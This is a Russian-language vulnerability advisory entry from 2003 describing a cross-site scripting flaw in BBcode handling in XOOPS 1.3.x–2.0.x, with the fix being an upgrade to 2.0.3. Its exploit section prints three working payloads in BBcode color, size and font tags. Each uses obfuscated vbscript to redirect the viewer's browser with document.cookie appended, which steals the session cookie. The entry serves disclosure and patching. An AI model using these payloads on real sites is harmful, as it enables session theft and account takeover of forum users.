Дата публикации: | 14.08.2003 |
Всего просмотров: | 1537 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в систему управления содержанием XOOPS. Удаленный пользователь может выполнить XSS нападение.
Удаленный атакующий может внедрить произвольный код сценария в некоторые BBcode тэги, который будет выполнен в браузере пользователя, просматривающего злонамеренное сообщение. Уязвимость может использоваться в модулях - Private Messages, News и NewBB (forum). Эксплоит: [color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+ Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color] [size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+ Chr(101)+Chr(102)+document.cookie))]a[/size] [font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+ Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]Уязвимость обнаружена в XOOPS 1.3.x-2.0.x Для устранения уязвимости, установите обновленную версию программы (2.0.3) |